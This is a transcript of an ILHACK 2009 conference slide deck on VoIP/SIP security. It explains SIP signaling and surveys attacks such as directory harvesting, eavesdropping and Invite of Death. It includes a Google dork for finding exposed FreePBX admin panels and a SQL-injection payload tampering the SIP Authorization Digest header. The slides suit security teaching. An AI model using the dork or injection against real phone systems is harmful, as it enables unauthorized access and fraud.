שקופית 1 - IL Hack Institute

Download Report

Transcript שקופית 1 - IL Hack Institute

SIP Tactics && Exploitation
ILHACK 2009
By Jacky Altal and Yosseff Cohen
About us – Jacky 4lt4l
Professional Experience:
• Two years as a security and data communication expert at local company.
• Six years as a software developer and Security Consultant at a local BioTech company.
• Hacking Defined Leading Instructor – Technion CISO/SECPROF
programs.
Specializing in:
• Penetration Testing
• Vulnerability Research
• Forensics Investigations
TOC
\x01 VoIP – The Real World
\x02 VoIP - Know Your Environment
\x03 VoIP - Security Threats
\x04 VoIP - Lab
\x05 VoIP - Q&A
\x01 VoIP – Reality
Why do we ask those Questions?
According to Emerging Cyber Threats for 2009 (Georgia Tech Info Sec Center)
more then 75 percents of corporate phone lines will be using Voice Over IP
(VoIP) in the next two years.
“From the outset, VoIP infrastructure has been vulnerable to the same types of
attacks that plague other networked computing architectures. When voice is
digitized, encoded, compressed into packets and exchanged over IP networks, it
is susceptible to misuse. Cyber criminals will be drawn to the VoIP medium to
engage in voice fraud, data theft and other scams—similar to the problems
email has experienced. Denial of service, remote code execution and botnets all
apply to VoIP networks, and will become more problematic for mobile devices
as well. “ Emerging Cyber Threats for 2009 by the Georgia Tech Information
Security Center
\x01 VoIP – Reality
“VoIP is about convergence. The idea is that you save money and
resources and time,” Next Generation Security
Because VoIP connects telephone calls via the Internet, it shares the
Internet’s weaknesses.
many incumbent telecommunication carriers have started offering
VoIP
the aspect of security, or lack thereof, is misunderstood by some of
the VoIP service providers. Includes local Providers I`m n0t Smiling…
VoIP Tactics && Hacking
\x01 VoIP – Reality
\x01 VoIP – Home
About us – Yossef Cohen (SIPM4ST3R)
Professional Experience:
• 10 years of experience in the telecom market working for Amdocs Israel,
last 3 years as Integration Manager for projects as Sprint 4G, AT&T and
BMCC china;
• Founder of MaxxVoice.com, developed during the Sabbatical year in
2006.
Specializing in:
• Penetration Testing
• Vulnerability Research
• Forensics Investigations
\x01 VoIP – Know Your Environment
VoIP
• VoIP: Voice Over Internet Protocol
– Phone calls over the internet
– Is used through softphones or IP phones/ATA
– Supports QoS
– Supports several audio codecs
\x02 VoIP – Know Your Environment
SIP
• SIP: Session Initialization Protocol
– Used for signaling
– Supports audio and video
– TCP and UDP
– Uses port 5060
– ASCII protocol like SMTP and HTTP
\x02 VoIP – Know Your Environment
RTP
• RTP: Real-time Transport Protocol
– Used for the voice transport
– UDP
– Is dynamic, not using standard ports
• RTCP: RTP Control Protocol
– Controls and monitors the voice transport
\x02 VoIP – Know Your Environment
Addressing
• SIP uses mail format address, in the pattern:
– <user | phone number>@<domain | hostname |
IP address>
• Some examples:
– [email protected][email protected]
\x02 VoIP – Know Your Environment
SIP Signaling
\x02 VoIP – Know Your Environment
SIP Signaling
• INVITE from caller
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.0.204:5060;rport;branch=z9hG4bK42ccbc6905
From: <sip:[email protected]>;tag=33a31c9c
To: <sip:[email protected]>
Call-ID: [email protected]
Contact: <sip:[email protected]:5060>
CSeq: 801 INVITE
Max-Forwards: 70
Allow: INVITE,CANCEL,ACK,BYE,NOTIFY,REFER,OPTIONS,INFO,MESSAGE
Content-Type: application/sdp
User-Agent: Nologo
Content-Length: 429
\x02 VoIP – Know Your Environment
SIP Signaling
• Ringing
<--- SIP read from 192.168.5.15:5060 --->
SIP/2.0 180 Ringing
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK565267b5
From: <sip:[email protected]>;tag=as23f90079
To: <sip:[email protected];user=phone>;tag=419b9912cbfa34b2
Call-ID: [email protected]
CSeq: 102 INVITE
User-Agent: Grandstream HT488 1.0.3.64 FXS
Content-Length: 0
\x02 VoIP – Know Your Environment
SIP Signaling
• Ok from Called peer (answered)
<--- SIP read from 192.168.5.10:5060 --->
SIP/2.0 200 OK
Via: SIP/2.0/UDP
192.168.5.10:5060;rport;branch=z9hG4bK62b65b4f29;received=1
92.168.5.10
From: <sip:[email protected]>;tag=1983eb6f
To: <sip:[email protected]>;tag=as36a497bc
Call-ID: [email protected]
CSeq: 802 INVITE
User-Agent: SIPM4ST3R
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE,
NOTIFY
Supported: replaces
Contact: <sip:[email protected]>
Content-Type: application/sdp
Content-Length: 264
\x02 VoIP – Know Your Environment
SIP Signaling
• ACK from caller to start the RTP session
<--- SIP read from 192.168.5.10:5060 --->
ACK sip:[email protected];user=phone SIP/2.0
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK384d1e7a
From: <sip:[email protected]>;tag=as23f90079
To: <sip:[email protected];user=phone>;tag=419b9912cbfa34b2
Contact: <sip:[email protected]>
Call-ID: [email protected]
CSeq: 102 ACK
User-Agent: SIPM4ST3R
Max-Forwards: 70
Content-Length: 0
\x02 VoIP – Know Your Environment
SIP Signaling
• BYE from called peer, hang-up
<--- SIP read from 192.168.5.15:5060 --->
BYE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.0.202;branch=z9hG4bKbcb6e24514450a48
From: <sip:[email protected];user=phone>;tag=2efac6b2150259f8
To: <sip:[email protected]>;tag=as1ca51ab9
Call-ID: [email protected]
CSeq: 33409 BYE
User-Agent: Grandstream HT488 1.0.3.64 FXS
Max-Forwards: 70
Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE
Content-Length: 0
\x02 VoIP – Know Your Environment
SIP Signaling
• BYE from caller
<--- SIP read from 192.168.5.10:5060 --->
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.0.201:5060;branch=z9hG4bK099b03fe
From: <sip:[email protected]>;tag=as36a497bc
To: <sip:[email protected]>;tag=1983eb6f
Call-ID: [email protected]
CSeq: 102 BYE
Content-Length: 0
\x03 VoIP - Security Threats
Layer
Network
Physical attack
Internet
IP Spoofing
Redirect via
IP
TCP/UDP
Flood
TCP/UDP
Replay
Tftp Insertion
DHCP
Insertion
Transport
Application
ARP Cache ARP Flood
MAC
Spoofing
IP Frag
Spoof
RTP Tamper
\x01 VoIP – Reality
\x01 VoIP – Reality
\x01 VoIP – Reality
Unblock the Blocker – Kevin Mitnik
Google Dork:
intext:"FreePBX Administration" + "Welcome" inurl:Admin
Default Trix Box VOIP Servers
Default passwords, vulnerable servers.
Google Dork:
intext:"FreePBX Administration" + "Welcome" inurl:Admin
Default passwords, vulnerable servers.
Google Dork:
intext:"FreePBX Administration" + "Welcome" inurl:Admin
Default passwords, vulnerable servers.
Directory Harvesting
VoIP directory harvesting attacks occur when attackers attempt to find valid VoIP
addresses by conducting brute force attacks on a network. The attacker can send
thousands of VoIP addresses to a particular VoIP domain, those that are not
returned, are valid VoIP clients.
‫ לפטופ‬5060 ‫להוסיף פה תמונת מסך של סריקה‬
Eavesdropping
Voice packets are subject to man-in-the-middle attacks where a hacker spoofs the
MAC address of two parties and forces VoIP packets to flow through the hacker's
system.
• Reassemble voice packets
• Listen in to real-time conversations
Hackers can also gain access to all sorts of sensitive data and information, such as
user names, passwords, and VoIP system information.
SQL-Injection & Password Guessing can be launched in distributed nature with
different SIP URI
SQL-Injection Tampering via SIP
AuthorizationDigest header can be tampered in order to inject SQL query.
Update subcriber set first_name=‘jacky_altal’
Where username=‘asterisk’--,
realm-=“192.168.10.100”, algortim=“md5”,
Nonce=“41351a34b342b43434d223421d”,
Response=“a6466dce7890e087e6e55e67e2ee3”
Invite Of Death Attack
The Invite of Death attack simply demonstrates that VoIP is affected by exactly the
same types of vulnerabilities as any other IP application. In this case a simple
implementation error leaves the application open to a remote Denial Of Service
attack. This vulnerability has already been fixed but there are many others to
come.
In other words, if you are relying on a generic firewall to protect your voice
system, the chances are that it will not block or even detect these threats.
SIPy – send spoofed call to sip client Killer
Written by Jacky Altal and Yossef Cohen
SipY – SIP software testing,
SipY – SIP Server/Client Vulnerability testing,
SIP Relay Attack
Modify Request
Proxy
Attacker
Reverse Request
Modify Request
Victim
Out Dial
Are You R-E-A-D-Y??? Let`s F-I-G-H-T!!!
LAB
CentOS - Linux Distro
http://www.centos.org/
Asterisk – Open Source PBX http://www.asterisk.org/
xLite – SIP Client
Iphone sip client ( home made )
Of course that there are many other codecs and other stuff….
iWar – 012;) Network Range Mass Scanning
We can find other lines,
scan network ranges, by
IP`s and phone numbers.
Find FREE X.25 networks
Free SEX Lines,
http://www.softwink.com/iwar/
Encryption what is it good for?
Provisioning Servers
しかたが ない Shikata ga nai….
Question? > /dev/null
The End
[email protected] [email protected]
http://4lt4l.blogspot.com